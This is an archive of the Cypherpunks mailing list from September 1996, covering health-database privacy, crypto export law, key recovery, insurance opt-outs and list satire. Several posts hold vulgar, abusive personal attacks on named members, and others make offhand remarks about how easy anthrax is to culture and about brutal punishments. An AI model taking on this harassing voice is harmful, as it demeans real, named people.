thanks for any info, - -patrick finerty - -- "Those that give up essential liberty to obtain a little temporary safety deserve neither liberty nor safety." -- Benjamin Franklin (1773) finger for PGP key zifi runs LINUX 2.0.20 -=-=-=WEB=-=-=-> http://zifi.genetics.utah.edu From mclow at owl.csusm.edu Wed Sep 18 23:59:20 1996 From: mclow at owl.csusm.edu (Marshall Clow) Date: Thu, 19 Sep 1996 14:59:20 +0800 Subject: GAK, GAP, GAY In-Reply-To: Message-ID: Rabid Wombat wrote: >Don't get me wrong - I'm not disagreeing with you about how grim your >points are. I just wanted to point out that information "could" be >released to researchers without identifying the patient - researchers are >generally interested in statistical data, such as the incidence of cancer >per zip code, etc., which doesn't require your name to be released. Zip >codes are sufficiently populated that this probably is of no danger to >privacy. > Um..... Zip code 92067-1234 is my mother's mailing address. OK, it's not -1234, but there is a 9 digit zip code that is sufficient to get mail to my mother, and my mother alone. P.S. This is less than 5 miles outside the city limits of San Diego; hardly a "low population density" area.
-- Marshall Marshall Clow Aladdin Systems "We're not gonna take it/Never did and never will We're not gonna take it/Gonna break it, gonna shake it, let's forget it better still" -- The Who, "Tommy" From frantz at netcom.com Thu Sep 19 00:05:21 1996 From: frantz at netcom.com (Bill Frantz) Date: Thu, 19 Sep 1996 15:05:21 +0800 Subject: Fear of Flying -- from HotWired Message-ID: <199609190446.VAA04571@netcom8.netcom.com> At 2:51 PM 9/18/96 -0400, Black Unicorn wrote: >On Wed, 18 Sep 1996, Bill Frantz wrote: > >> At 1:21 AM 9/18/96 -0400, Black Unicorn wrote: >> >> On Thu, 12 Sep 1996 12:03:18 -0700, Bill Frantz wrote: >> >> >Gee, biotech has come a long way. Now I can download the Anthrax DNA >> >> >sequence from the net and insert it in some carrier bacteria and start >> >> >making Anthrax bacteria. Neat! >> > >> >Culturing and growing anthrax is painfully simple. No DNA required. >> >> Sorry Unicorn, you missed my point. (1) You need DNA to grow bacteria. >> You can get the DNA two ways. (A) You get a sample of the beast, or (B) >> You get a DNA sequence and then regenerate the DNA. (I don't think B is >> technically feasable yet.) (2) You can't send samples of the beast thru >> the net. > >I think your point was that the net was not responsible for the >proliferation of Anthrax development data. (Am I wrong?) My point was that you need more than just information (but see below). You also need some materials that may be hard to get. Being totally ignorant in the anthrax growing area, I have no idea where I would get my starter bacteria. (Presumably any net-info would tell me. I haven't looked.) At 12:34 PM 9/18/96 -0800, Jim McCoy wrote: >Yes, B is possible. At the moment the devices only work for relatively >small sequences but this is improving and the current generation should be >able to handle a constructing a bacteria sequence pretty well... Ergo >you _can_ send samples of the beast through the net (or at least genetic >clones.) 
Oh well, if not this year, then next people will be able to down load any virus/bacteria they want. Come the millennium, it will be plants, with mice and rats to follow. Black Unicorn wrote: >My point was that in the eyes of the "leaders" all that is required to >make the net responsible for the proliferation is for the process to be >describeable in a simple one or two page set of instructions (such as >Anthrax is). I have no problem with your point. Mine was intended as sarcasm. ------------------------------------------------------------------------- Bill Frantz | "Cave softly, cave safely, | Periwinkle -- Consulting (408)356-8506 | and cave with duct tape." | 16345 Englewood Ave. frantz at netcom.com | - Marianne Russo | Los Gatos, CA 95032, USA From mab at research.att.com Thu Sep 19 00:12:45 1996 From: mab at research.att.com (Matt Blaze) Date: Thu, 19 Sep 1996 15:12:45 +0800 Subject: cfs users group dead? In-Reply-To: <199609190426.WAA20012@zifi.genetics.utah.edu> Message-ID: <199609190504.BAA00599@nsa.research.att.com> >is the cfs-users at big.att.com list dead? i haven't seen anything for >some time and mail i sent just bounced with a bad error. actually, i >just got another one. two-for-one bounces if you mail through the >cfs-users list! > >thanks for any info, > >- -patrick finerty Yes, it seems to be. It runs on a machine that is no longer in my office, and may have gotten mis-configured when the AT&T breakup happened. I'll check it out (but not for at least a week; unfortunately I'll be out of the office 'till then). -matt From craigw at dg.ce.com.au Thu Sep 19 00:16:46 1996 From: craigw at dg.ce.com.au (craigw at dg.ce.com.au) Date: Thu, 19 Sep 1996 15:16:46 +0800 Subject: Banking over the net Message-ID: <199609190520.PAA18516@mac.ce.com.au> For some time several Australian Banks have been interested in setting up online banking via the web. Currently the Commonwealth Bank does have online banking, but on non-internetworked servers. 
This requires an encrypted password. Currently this involves logging into the bank server directly transferring the password, at which case the user has access to their accounts. The unfortunate details are that the instructions for the account are not sent encrypted. Apart from the initial password, all data is sent plain text. There is likely to be implemented an initial web trial of this service in December this year. Hopefully the security will be upgraded a little. Where this is not likely is that the likely candidate for encryption over the net is going to be 40bit netscape (as what bank wants to go against the wishes of the US gov). The banks feel secure in that they are providing a 128bit secured password to the customer via mail. This seems to be the end of the security. While the average member of the public blindly trusts the banks to keep them safe, and until there is a user friendly means of encrypting data (that the US government supports), I can see a lot of room for fraud. Soon, we may all be staring at our computers, wondering whether they're staring back. [Network Admin For WPA Business Products. aka doshai >;-) ] http://pip.com.au/~doshai/ Key fingerprint = 2D F4 54 BB B4 EA F1 E7 B6 DE 48 92 FC 8D FF 49 Send a message with the subject "send pgp-key" for a copy of my key. (if I want to give it to you) From attila at primenet.com Thu Sep 19 00:21:52 1996 From: attila at primenet.com (attila) Date: Thu, 19 Sep 1996 15:21:52 +0800 Subject: No Subject Message-ID: <199609190531.XAA10513@InfoWest.COM> Mike Farrell, actor and longtime opponent of the death penalty: "We don't rape rapists, we don't burn arsonists, why should we kill killers?" well, come to think of it, why don't we let a bull rape a rapist?
or burn an arsonist at the stake? seems fair to me. maybe even sell tickets to pay for the cost. -- one of the few things we all share: the utter, corrosive contempt for our elected officials. -- Politicians are like diapers. They both need changing regularly, and for the same reason. From unicorn at schloss.li Thu Sep 19 00:26:50 1996 From: unicorn at schloss.li (Black Unicorn) Date: Thu, 19 Sep 1996 15:26:50 +0800 Subject: Stinger Specs Message-ID: Stinger (AIM-92) (Jane's #: 6604.331) 152 x 7-14 cm (l x d - span) Weight: 18 kg Warhead: HE Propulsion: Solid Range: 2-4 km Guidance: IR Exact effective range / altitude is not listed in the quick guide I have on my desk. I will pull it out of a larger volume when I have time. -- I hate lightning - finger for public key - Vote Monarchist unicorn at schloss.li From lucifer at dhp.com Thu Sep 19 00:28:16 1996 From: lucifer at dhp.com (Mixmaster) Date: Thu, 19 Sep 1996 15:28:16 +0800 Subject: Cypherpunk Enquirer [NOISE] Message-ID: <199609190441.AAA12078@dhp.com> THE CYPHERPUNK ENQUIRER "Encyphering minds want to know." The EFF announced an agreement with the Clinton administration that will "guarantee Americans rights to privacy and anonymity on the Internet for the forseeable future". The agreement, which includes unspecified concessions by the President on matters of encryption, privacy, and the export of encryption programs, is to be signed today in the White House Rose Garden. An EFF official, who wished to remain anonymous, chortled, "We got basically what we wanted, and all we had to do was give up Czechoslovakia." Cellular One today announced the signing of noted Cypherpunk Tim May as their official Internet spokesperson. Mr. 
May will be filming a series of commercials featuring himself in a hot tub calling a variety of 1-900 numbers on a cellular phone, while a voice-over by Cellular One executives extoles their recently announced 'Geek Plan', featuring free calls during computer hacker's normal waking hours of 7pm to 7am, with all calls to pizza parlors for delivery half-price for the first year. The commercials, the first to be filmed entirely in the 'quick-time' format, should be appearing on commercial web pages within the month. The Cypherpunk Academy of Codes and Cyphers has announced the first official offshoot of the Cypherpunks list. The Junior Auxillary, anchored by the new mailing list cyphertots at juno.com, will give budding hackers the chance to get out of the house and hear famous Cypherpunks like Bill Stewart and Robert Hettinga lecture on topics such as "The Port 25 Hack - Fact or Fiction", "Hacking the Transmitter on Your Ankle Bracelet", and "SPAM - Cypherbabes are Impressed by a REALLY BIG One." To join, send a message with the body "subscribe cyphertots" to majordomo at cybercrime.fbi.gov. (note to juno.com - we don't do personals) In related news, John Young will be tutoring Dr. Dimitri Vulis in English as a Second Language. Scientists flocked to toad.com recently in response to the first authenticated sighting of a Perrygram in months. The Perrygram, only recently thought extinct, was spotted on the cypherpunks mailing list after an absence of several months. Specialists speculate that it may have detected the recent list increase in its favorite food - pure, unadulterated bullshit. The Reputation Capital markets remained in a deep slump after the recent closings of alpha.c2.org and anon.penet. Analysists estimate the loss in over 1 billion in reputation capital, with the effect spilling over to the rest of the market. 
Since the loss of anon.penet, Black Unicorn is down 12 5/8, Atilla down 4 3/4 to 8 1/2, Jim Ray is down 10, and Tim May, as usual, is being investigated by the Blacknet Securities and Exchange Commission for his timely shorting of Lucky Green. Novell President Joe Marengi announced today that Novell would begin bundling Microsoft's Internet Explorer with Novell Netware in the third quarter. In return, Microsoft announced plans to release his 8 year old daughter Suzanne unharmed. Next in the Enquirer: HIDE THE KIDS! FIRE UP SURFWATCH! Sandy Sandfort's latest party - WE HAVE MPEGS! From unicorn at schloss.li Thu Sep 19 00:45:09 1996 From: unicorn at schloss.li (Black Unicorn) Date: Thu, 19 Sep 1996 15:45:09 +0800 Subject: Fear of Flying -- from HotWired In-Reply-To: <199609190446.VAA04571@netcom8.netcom.com> Message-ID: On Wed, 18 Sep 1996, Bill Frantz wrote: [...] > Black Unicorn wrote: > >My point was that in the eyes of the "leaders" all that is required to > >make the net responsible for the proliferation is for the process to be > >describeable in a simple one or two page set of instructions (such as > >Anthrax is). > > I have no problem with your point. Mine was intended as sarcasm. I can be sarcasm impaired. Sorry. > > > ------------------------------------------------------------------------- > Bill Frantz | "Cave softly, cave safely, | Periwinkle -- Consulting > (408)356-8506 | and cave with duct tape." | 16345 Englewood Ave. 
> frantz at netcom.com | - Marianne Russo | Los Gatos, CA 95032, USA > > > -- I hate lightning - finger for public key - Vote Monarchist unicorn at schloss.li From flatline at direct.ca Thu Sep 19 16:04:58 1996 From: flatline at direct.ca (Der Fuhrer of SS) Date: Thu, 19 Sep 1996 16:04:58 -0700 (PDT) Subject: unsubscribe Message-ID: <96Sep19.160455-0700pdt.30137-25649+333@orb.direct.ca> unsubscribe From nobody at flame.alias.net Thu Sep 19 01:05:30 1996 From: nobody at flame.alias.net (Anonymous) Date: Thu, 19 Sep 1996 16:05:30 +0800 Subject: The periodic caveat about Timmy May Message-ID: <199609190517.HAA00851@basement.replay.com> Timmy May habitually digs into his cesspool of a mind for his mailing list fertilizer. From mycroft at actrix.gen.nz Thu Sep 19 01:11:52 1996 From: mycroft at actrix.gen.nz (Paul Foley) Date: Thu, 19 Sep 1996 16:11:52 +0800 Subject: Workers Paradise. /Political rant. In-Reply-To: <199609152344.RAA15298@InfoWest.COM> Message-ID: <199609190346.PAA01360@mycroft.actrix.gen.nz> On Sun, 15 Sep 96 23:43:33 +0000, attila wrote: Now, I don't intend to be Scrooge, but I'll fight for my rights to cut off at the knees the knee-jerk liberals and government slavemeisters who want to tell me that I, and 2 others are required to support 100 freeloaders. Two others, huh? Lucky you :-) >From somewhere (i.e. I didn't write it and I don't know who did): I'm tired. Yes, I'm tired. For several years I've been blaming it on middle age, poor blood, lack of vitamins, air pollution, saccharin, obesity, dieting, under-arm odour, yellow wax buildup and another dozen maladies that make you wonder if life is really worth living. But I found out it ain't that. I'm tired because I'm overworked. The population of this country is 3.3 million, 0.5 million are retired, that leaves 2.8 million to do the work. There are 1 million in school, that leaves 1.8 million to do the work. 
200,000 are unemployed and 400,000 are employed by the Government, that leaves 1.2 million to do the work. 300,000 are employed by City and Borough Councils, leaving 700,000 to do the work. There are 420,000 people in hospital and 279,998 in prison. That leaves two people to do the work. You and me. And you are sitting on your arse reading this. No wonder I'm bloody tired. -- Paul Foley --- PGPmail preferred PGP key ID 0x1CA3386D available from keyservers fingerprint = 4A 76 83 D8 99 BC ED 33 C5 02 81 C9 BF 7A 91 E8 ---------------------------------------------------------------------- There is nothing wrong with Southern California that a rise in the ocean level wouldn't cure. -- Ross MacDonald From asgaard at Cor.sos.sll.se Thu Sep 19 01:15:51 1996 From: asgaard at Cor.sos.sll.se (Asgaard) Date: Thu, 19 Sep 1996 16:15:51 +0800 Subject: GAK, GAP, GAY In-Reply-To: Message-ID: On Wed, 18 Sep 1996, Timothy C. May wrote: > On a related note, I read an article yesterday about the proposed new > Health Data Base, with all encounters with any medical institution or any > health care provider of any sort being cross-linked and cross-referenced. Scary. The benefits for the singular patient would be very marginal. Epidemiologic research would become easier, with lots of opportunities for the publish-or-perish academic medical crowd, but we already know that smoking etc is bad for us. The real agenda is of course to make life easier for the insurance business, our would-be employers and the State. > the master index was born....Only people with a 'security ticket'--such as > doctors, insurers, scientific researchers or police with a proper > warrant--are supposed to be able to see the clinical details....Kathy Ganz, > director of the New Mexico Health Policy Commission, said, "Rights to > privacy are genuine concerns, but they will need to be balanced against > notions of common good." 
The specialized software industry is currently flooding the medical community with applications for all sorts of patient-related info. It started with the small units (offices, with a single or a handful of doctors etc), which are already doing a lot of their record-keeping on digital media, often with lousy security. Now the turn has come to the big hospitals, which need heavily customized implementations of the basic product they will choose. Although most serious products have proper authentication routines (including smartcards; especially nurses seem to be totally unable to handle passwords above the my_cat's_name level), the overall availability of patient data will rise enormously with digital storage. The trend in the US is for large companies to take over more and more of the big hospitals (in Sweden almost all hospitals are owned by the 'public', with a trend towards bigger and bigger integrated 'regions') mandating larger and larger databases. So even without an outspoken decision the Grand National Health Database is worming itself upon us. > Pretty chilling, eh? As we all know, once such medical, dietary, and > genetic data bases are established, the likelihood of privacy-invading > use is near unity. It certainly is. And cryptography can not do that much about it since it's primarily a problem of user integrity. Asgaard From scmayo at rschp2.anu.edu.au Thu Sep 19 01:17:03 1996 From: scmayo at rschp2.anu.edu.au (Sherry Mayo) Date: Thu, 19 Sep 1996 16:17:03 +0800 Subject: Australian "ITAR" regulations Message-ID: <199609190543.WAA01040@toad.com> Hi all Some time ago I had various email exchanges regarding Australian crypto export regulations. More recently I've been put in the picture by David Cox and others that there are in fact ITAR-like laws in force in Australia. The last time I looked into this, Matt Crean(?) had very little luck finding any info from the various relevant departments, half of whom didn't seem to have a clue.
In short, Crypto export from Australia is illegal without a licence - this is making it difficult for David's software firm to compete with their unhampered German competition. Using the following search URL you can find the relevant text (shortened version appended) http://www.austlii.edu.au/cgi-bin/sinodisp.pl/au/legis/cth/consol_reg/cer439/sch13.html?query=cryptographic However, if anything is done about ITAR in the US, I wouldn't be at all surprised if Australia follows suit. Sherry ps There is an awful lot of crap on c'punks these days - reading it is a bit of a needle in a haystack exercise ;-( ========================= CUSTOMS (PROHIBITED EXPORTS) REGULATIONS - SCHEDULE 13 MILITARY AND NON-MILITARY GOODS (EXPORTATION PROHIBITED EXCEPT ON PRODUCTION OF A LICENCE OR PERMISSION UNDER REGULATION 13B) >>>[snip]<<< 43. Other goods as follows: (a) complete or partially complete cryptographic equipment designed to ensure the secrecy of communications (including data communications and communications through the medium of telegraphy, video, telephony and facsimile) or stored information; (b) software controlling, or computers performing the function of, cryptographic equipment referred to in paragraph (a); (c) parts designed for goods referred to in paragraphs (a) or (b); (d) applications software for cryptographic or cryptanalytic purposes including software used for the design and analysis of cryptologics; (e) radio transmitters and receivers for spread spectrum or frequency agile communications systems having a total transmitted bandwidth that is: (i) 100 or more times greater than the bandwidth of any one information channel in the system; (ii) in excess of 50 kilohertz; or (iii) designed or modified to use cryptographic techniques to generate the spreading code for spread spectrum or the hopping code for frequency agile systems; (f) parts designed or adapted for goods referred to in paragraph (e); (g) software and equipment designed or adapted for controlling 
the functions of goods referred to in paragraph (e); (h) information security systems, equipment, software, application specific assemblies, modules or integrated circuits, designed or modified to provide certified or certifiable multi-level security of user-isolation at a level exceeding Class E4 of the Information Technology Security Evaluation Criteria (ITSEC) or equivalent in force at the commencement of these Regulations; (i) software designed or adapted for the purpose of demonstrating that the information security features referred to in paragraph (h) provide a multi-level security or user-isolation function. From dthorn at gte.net Thu Sep 19 01:22:38 1996 From: dthorn at gte.net (Dale Thorn) Date: Thu, 19 Sep 1996 16:22:38 +0800 Subject: A daily warning regarding Timothy C. May In-Reply-To: Message-ID: <3240C486.15E0@gte.net> Daniel Christopher Miskell wrote: > Timothy C. May is a lying sack of shit. > Right. And you had to insult him through use of anonymous mail. Boy, > you're real brave, shedding the light to the rest of the cypherworld > in such a manner. > Apologies for the spam, but there was no address, obviously. > If in fact we are the only intelligent life on this planet, why the > fuck are we in this goddamn mess? A. There's probably no intelligent life in the (this) universe, and the Uncertainty Principle is probably wrong, too (i.e., there is really no Free Will, so there are no valid answers either), -and- B. If you were truly intelligent, would you want to come here? From attila at primenet.com Thu Sep 19 01:45:13 1996 From: attila at primenet.com (attila) Date: Thu, 19 Sep 1996 16:45:13 +0800 Subject: No Subject Message-ID: <199609190615.AAA11252@InfoWest.COM> Dimitri; your taste is limitless, your tongue in every sewer. must we suffer the depths of your insane depravity? should we drop a dime on you? you're a disgrace to humanity. must we scan even body text to get rid of you? 
I doubt Tim cares about the lunatic ravings of someone as mad as the mad N's "ice weasels," but your childish profaning of humanity seems to have no bounds. I am flat against censorship, but I think this warrants excluding Dimitri from the list. block his posts and block his subscription. these personal attacks have nothing to do with your general rights; collectively, we are permitted to screen against a banal display of ignorance. On Wed, 18 Sep 1996, Dr.Dimitri Vulis KOTM wrote: > > Shamster: SHA-enabled biocomputing hamster. > > I'm sure Timmy would like to wrap one up in duct tape and shove it > up his ass... > From westo at bssc.edu.au Thu Sep 19 16:51:41 1996 From: westo at bssc.edu.au (barina man) Date: Thu, 19 Sep 1996 16:51:41 -0700 (PDT) Subject: No Subject Message-ID: <1.5.4.32.19960920135153.006855d0@172.24.10.10> unscribe From perng at cs.ucla.edu Thu Sep 19 16:53:55 1996 From: perng at cs.ucla.edu (Chang-Shing Perng) Date: Thu, 19 Sep 1996 16:53:55 -0700 (PDT) Subject: Unsubscribe In-Reply-To: <199609192042.NAA16104@sirius.infonex.com> Message-ID: <3241DBC5.4A86@cs.ucla.edu> UNSUBSCRIBE From asgaard at Cor.sos.sll.se Thu Sep 19 02:02:49 1996 From: asgaard at Cor.sos.sll.se (Asgaard) Date: Thu, 19 Sep 1996 17:02:49 +0800 Subject: GAK, GAP, GAY In-Reply-To: <199609190117.SAA04924@netcom21.netcom.com> Message-ID: On Wed, 18 Sep 1996, Vladimir Z. Nuri wrote: > of blinding and zero-knowledge protocols applied to health databases. > it seems reasonable that this can be worked out. De-identified records are common in medical research, where applicable. The problem is that for effective epidemiological research the self-generated ID you propose must be applied in a lot of databases outside of health care. The epidemiologist wants to know when you were born, when you give birth or die or buy liquor, your income, standard of living, grade of radon contamination in your house, what Web-pages you access etc etc. 
(The Swedish Post is currently spending a lot of money advertising their new Web services. For full access to such sensitive data as detailed weather maps you have to enter your name, address and Person Number - for credit information, they say - and they will send you, by snail mail, a username and password; http://www.torget.se) So in the end you haven't really gained much by creating your own ID - it will be just as useful to the State as if they had given it to you. Asgaard From dthorn at gte.net Thu Sep 19 02:17:44 1996 From: dthorn at gte.net (Dale Thorn) Date: Thu, 19 Sep 1996 17:17:44 +0800 Subject: A Bizarre Increase in the Ad Hominems Here In-Reply-To: Message-ID: <3240C258.3464@gte.net> Dr.Dimitri Vulis KOTM wrote: > tcmay at got.net (Timmy May) (fart) writes: > * Detweiler (vznuri at netcom.com) writes: > Detweiler is much smarter than VZNuri (or Timmy). I don't think Timmy > believes his own lies. > .....random slurs deleted..... > Recently, 3 people in the computer security field have independently > told me that Timmy May approached them "off-list" to complain about > things I supposedly say on the Internet - most of which I never said. > When I asked about it on this mailing list, Timmy posted what was > shown to be a lie (about his complaint to Kelly Goen.) Timmy is known > as a nutcase and a liar - if he keeps up his "character assassination" > attacks, the only reputation he hurts is his own. Pardon me for butting in, but "nutcase and liar" are some pretty significant slurs, moreso than "putz" or "bozo" or whatever. I'd say there's gotta be a helluva story here. Background, anyone? 
From rp at rpini.com Thu Sep 19 02:18:44 1996 From: rp at rpini.com (Remo Pini) Date: Thu, 19 Sep 1996 17:18:44 +0800 Subject: WinSock Remailer Version ALPHA 1.3 Now Available Message-ID: <9609190709.AA20094@srzts100.alcatel.ch> -----BEGIN PGP SIGNED MESSAGE----- Mime-Version: 1.0 Content-Type: text/plain Content-Transfer-Encoding: 7bit To: cypherpunks at toad.com Date: Thu Sep 19 09:07:16 1996 Has it already been exported by some sinister anonymous? If so, where? - ------< fate favors the prepared mind >------ Remo Pini rp at rpini.com PGP: http://www.rpini.com/crypto/crypto.html - ----< words are what reality is made of >---- From dthorn at gte.net Thu Sep 19 02:25:13 1996 From: dthorn at gte.net (Dale Thorn) Date: Thu, 19 Sep 1996 17:25:13 +0800 Subject: cypherpunk listserve usefulness In-Reply-To: Message-ID: <3240C832.E1E@gte.net> Chip Mefford wrote: > As much as it shames me, I have recently discovered that by filtering > messages from only 2 participants and setting body filters on 3 > keywords have remarkably improved the usefulness of this listserve. > As much as I do enjoy some of the filtered subject matter, I really > feel it is very off subject and makes this listserver useless for the > intended task. > I guess that makes me a censor and it has me reexamining some things. Why not have the filter be more like a sieve, and dump the low-priority stuff into separate containers, then sort them by personal criteria such as message size, frequency of key words, etc.? 
If you maintain multiple sorts, you can look over the stuff when you have a chance, and mass-dump a series of messages that don't make a cutoff you specify at read-time. Since I write my own utilities, I can mix and match keyword parsers, multiple-indexed text browsing, and so on. Of course, the commercially-available software totally sucks... From tcmay at got.net Thu Sep 19 02:25:58 1996 From: tcmay at got.net (Timothy C. May) Date: Thu, 19 Sep 1996 17:25:58 +0800 Subject: The Beauty of "A la Carte" Insurance Plans Message-ID: At 8:44 PM 9/18/96, jbugden at smtplink.alis.ca wrote: >I don't speak for the left, nor for the right. I don't think that there is a >unified voice on either side of the political spectrum. However I do find it >ironic that market driven health insurance has the potential to be more >intrusive into personal life than many government systems (cf. genetic >screening). > >If all you do is replace Big Brother with Big Business, then all that has >changed is the name. To paraphrase the character in "The Graduate": "One phrase, Benjamin...a la carte insurance." I delight in explaining this point to people, and watching the glimmer of understanding take hold, then watching them realize the implications. I recall explaining this view a couple of years ago here on this list, but probably not since then. So, time has come for me to give it another shot. Is there an alternative to a Giant Corporation (tm) essentially performing the role of Big Brother? I submit that there is. Here's what one does. I'll use a concrete example. Suppose that one is not a homosexual, is not engaging in anal intercourse with partners, is not an IV drug user, and is not a hemophiliac. Further, suppose that one is reasonably monogamous (e.g., fewer than several different sex partners a year, and such partners are themselves not in high-risk groups, as defined in the first part of this paragraph). Such a person is in a very low risk group for AIDS. 
What one does is to *opt out* of any coverage for AIDS-related coverage. One opts out completely, signs a waiver to this effect, and absolves the insurer of any responsibility for AIDS- or ARC-related illnesses. (This is not perfect, is not "fine-grained" enough, compared to an insurer doing exhaustive tests and lifestyle interrogations and then offering some precise rate to be paid. But it has the advantage that the insurer does not get the exhaustive and intrusive lifestyle information, and the rough cut of "opting out" is almost certainly OK for most low-risk persons. Your mileage may vary, in which case you may submit to a detailed lifestyle analysis. Sadly, many laws exist which don't allow insurance companies to ask the questions and do the tests needed to establish the risk of getting AIDS--sort of like not allowing an insurance company to ask if a person is a low-risk philosopher or a high-risk aircraft test pilot!) Ditto for any other disease which one can either make a reasonable estimate of, or can be _tested for_ (tested privately, independently of any insurance company!). Thus, for the various _genetic_-related diseases, one can check independently to see if one is a reasonably likely carrier of such genes, and, if not, can *opt out* of any coverage for those diseases. This process of *opting out* has the beautiful advantage of taking one's self out of the "subsidizers" pool while not materially affecting one's actual risk of being uncovered for some disease or condition. And all without an intrusive physical exam (though an exam may still be asked for, etc.). The parallel is quite close to people opting out of coverage for things they know they are not at risk for, such as hang-gliding accidents, horseback-riding accidents, aircraft test piloting, etc. 
(Such exemptions are not "enforced" by the insurance company following one around, or mounting a "position escrow" device on one's body, but by the eminently reasonable approach of simply not paying off if the accident was due to a hang-gliding accident, a horseback riding accident, etc. This is how the "non-smoker" discounts in auto insurance work...finding strong evidence that one is actually a smoker (crud in the lungs, cigarette butts all around the house when living alone, etc.) is positive evidence that one lied about being a non-smoker, and the policy is cancelled without payout.) I wish I could say I thought of this stratagem of "opting out," but I believe I read about it some years ago in "Reason" or "Liberty." It understandably outrages liberals, who realize that people will arrange private tests for themselves, and will then opt out of a la carte coverage of diseases they reasonably believe are unlikely to affect them. (Nothing is certain, of course, and there is some chance that if one opts out of coverage for Lou Gehrig Disease, or MS, or AIDS, that one may still end up with one of these diseases. TANSTAAFL, and most people will jump at the chance to remove themselves from a pool for something they feel they are very unlikely to get.) To relate this to the other examples, if one opts out of SCUBA-diving coverage, because one is not a SCUBA diver, this does not require the insurance company to intrusively investigate one's life. Diving accidents just don't get covered, period. Some have argued that a la carte insurance should be banned, for precisely this reason, that people will always be able to "game against" the rules. (To make this clear, the flip side of someone opting out of coverage for Disease A is that someone else may already know they are very likely to have Disease A or be at strong risk for Disease A. 
Forcing an insurance company to accept all applicants means this second category can game against the system, getting more out of the system than they expect to put in.) Supporting the "opting out" or "a la carte" approach to insurance allows personal privacy to be maximally preserved. --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From dthorn at gte.net Thu Sep 19 02:36:09 1996 From: dthorn at gte.net (Dale Thorn) Date: Thu, 19 Sep 1996 17:36:09 +0800 Subject: The GAK Momentum is Building... In-Reply-To: Message-ID: <3240DD33.28B6@gte.net> Lucky Green wrote: > On Wed, 18 Sep 1996, Jim Ray wrote: > I agree, and hope so. "Key Recovery," while not as Orwellian-sounding > as "GAK," is a step on the path to honesty WRT the English language, > though it's important to continually point out, as Tim did in his > post, that *access* -- rather than just recovery -- is obviously what > Mr. Freeh wants. > I'd count this likely change in terminology as a "cypherpunk victory," > albeit a very small and certainly a very hard-fought one. > Nope. It is a Cypherpunk loss. The use of the term "key recovery" for > GAK now fully obfuscates the distinction between accessing a > backup copy by the legitimate owner (or his estate, employer, etc.) > and GAK. Many PKIs will support the former type of key recovery. And > for good reasons. Thanks to the brainwashers using the same term for > GAK, it will now become impossible to tell from a basic description of > a PKI if it supports GAK or not. 
Furthermore, those who oppose the > latter type of key recovery (us!), will be pushed further into the > fringe by the media now being able to mix up our arguments against GAK > with arguing against true key recovery. [Do you notice the weird > constructs I have to use to distinguish the two meanings? One of them > being new...] > --Lucky My comment: Once the big Corp.'s get used to the new game, they'll put the non-critical stuff out there for Mr. Freeh, and for the really secret data, if the cops confiscate anything they can't read, the Corp. security will put it off on a fall-guy, even as high as the CEO if necessary. I just wanna see one case where a federal judge will try to bleed a big company for contempt for "refusing" to decode and hand over some ostensibly encrypted data. Matter of fact, there are probably cases similar to this that have already been through the appeals courts. From wombat at mcfeely.bsfs.org Thu Sep 19 02:40:51 1996 From: wombat at mcfeely.bsfs.org (Rabid Wombat) Date: Thu, 19 Sep 1996 17:40:51 +0800 Subject: [joke, non-code] Re: Get this for a snake-oil example :) In-Reply-To: Message-ID: ack barf snort, forgot my lithium, bad 'net night? -r.w. On Wed, 18 Sep 1996, Dr.Dimitri Vulis KOTM wrote: > f_estema at alcor.concordia.ca writes: > > Shamster: SHA-enabled biocomputing hamster. > > I'm sure Timmy would like to wrap one up in duct tape and shove it > up his ass... 
> > --- > > Dr.Dimitri Vulis KOTM > Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps > From dlv at bwalk.dm.com Thu Sep 19 02:45:23 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Thu, 19 Sep 1996 17:45:23 +0800 Subject: [NEWS] Crypto-relevant wire clippings In-Reply-To: <5gLguD3w165w@bwalk.dm.com> Message-ID: 
> > Money Laundering Alert: August 1996 > > 'Unauthorized' Banks Pose Laundering Threat > > They are subject to none of the recordkeeping or reporting requirements > of the Bank Secrecy Act, receive no examinations from any banking > regulator, and may be on your bank's currency transaction reporting > exemption list. > > The Office of the Comptroller of the Currency refers to them as > "entities that may be conducting banking operations in the U.S. without > a license." Money launderers probably refer to them as dreams come true > and, unless legitimate financial institutions are alert, can use them to > place illicit proceeds into the financial system. > > They are "unauthorized" banks, and for the past five years the OCC has > been disseminating advisories to legitimate U.S. banks - but not to > consumers - in an effort to expose their existence and halt their > illegal operations. 
> > These so-called "banks" offer a variety of banking services, often at > lower fees and better interest rates than legitimate banks offer. What > makes them different from a legitimate bank - and attractive to money > launderers -- is that they are not licensed by any U.S. banking agency > and thus do not have to meet regulatory standards. > > Because the OCC and other federal bank regulators are not investigative > agencies, they can do little more than report these institutions to > those who are. If the entities are found to be operating a bank without > a license they can be prosecuted under the Glass-Steagall Act (Title 12, > USC Sec. 378(a)(2)). > > Such prosecutions are rare. In one case in 1994, initiated by Federal > Reserve Board examiners, the principals of Lombard Bank, Ltd., were > charged with operating an unauthorized bank through a payable-through > account at American Express Bank International in Miami. Lombard, which > had been "licensed" in the South Pacific money laundering haven of > Vanuatu, offered its Central American customers virtually full banking > services in the U.S. through its PTA (MLA, Sep. 1994). > > Earlier this year, the OCC released a list of more than 50 "banks" known > to be operating without authorization. OCC officials say the number > grows steadily. Some of the "banks" say they are licensed by foreign > countries or U.S. states to conduct banking business. Others, such as > the Swiss Trade & Commerce Trust, Ltd., of Belize, continue to offer > services in the U.S. despite edicts from foreign banking authorities to > cease doing business. > > The unauthorized entities have a common trait. They usually have names > that are similar to those of well-known legitimate institutions. 
